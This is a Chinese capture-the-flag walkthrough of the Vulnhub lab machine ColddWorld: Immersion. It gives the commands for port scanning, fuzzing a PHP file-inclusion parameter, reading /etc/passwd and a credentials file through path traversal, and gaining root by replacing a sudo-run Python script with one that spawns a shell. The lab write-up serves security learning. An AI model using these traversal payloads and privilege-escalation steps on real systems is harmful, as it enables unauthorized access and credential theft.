当前位置: 首页 > news >正文

Vulnhub: ColddWorld: Immersion靶机

news 2025/8/30 4:02:50

kali:192.168.111.111

靶机:192.168.111.183

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.183

查看login的源码发现提示:page和文件/var/carls.txt

漏洞利用

wfuzz探测account.php页面发现文件包含,参数为page

wfuzz -c -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/burp-parameter-names.txt --hc 404 --hh 0 http://192.168.111.183/login/account.php?FUZZ=../../../../../../../../../../../../../../etc/passwd

包含/var/carls.txt发现carls用户账号密码:carls|carlos

http://192.168.111.183/login/account.php?page=../../../../../../../../../var/carls.txt

提权

查看carls用户sudo权限

切换到c0ldd用户后查看sudo权限

sudo -u c0ldd /bin/bash

删除/home/c0ldd/目录下的DoNotRun.py,再创建一个同名的python脚本写入提权命令

rm -rf DoNotRun.py
echo 'import os' > DoNotRun.py
echo 'os.system("/bin/bash")' >> DoNotRun.py
sudo -u root /usr/bin/python3 /home/c0ldd/DoNotRun.py

http://www.lryc.cn/news/113090.html

相关文章:

  • Redis 总结【6.0版本的】
  • 状态模式(C++)
  • 承泰科技Q3再获30多个智驾项目,新增订单0.86亿!累计近11亿!
  • 以太网Ethernet通信协议
  • 内网横向移动—资源约束委派
  • Spring Boot Logback日志格式改为JSON
  • Linux 块设备操作函数
  • linux c++网络编程基础:服务端与客户端的实现
  • 坐标转换-使用geotools读取和转换地理空间表的坐标系(sqlserver、postgresql)
  • JavaScript的主要应用场景有哪些?请描述一下JavaScript的基本数据类型和引用数据类型分别是哪些?
  • webpack性能优化
  • 保存和读取带有透明通道的视频
  • bilibili的评论ip属地显示未知
  • [BabysqliV3.0]phar反序列化
  • 数据库架构演变过程
  • webpack 静态模块打包工具
  • 万界星空科技/免费开源MES系统/免费仓库管理
  • 【暑期每日一练】 Epilogue
  • Go微服务实践 - Rpc核心概念理解
  • Effective Java笔记(27)消除非受检的警告
  • Dapper
  • Python基础知识(一)
  • QTthreadPool 程序
  • python注册机制Registry
  • 【Megatron-DeepSpeed】张量并行工具代码mpu详解(三):张量并行层的实现及测试
  • 【SpringBoot学习笔记】02. yaml配置注入
  • 【初阶C语言】指针的妙用
  • 链表——LinkedList类的概述和实现
  • 快六一啦,学习CSS3实现一个冰淇淋动画特效
  • VSCode CMake vcpkg 整合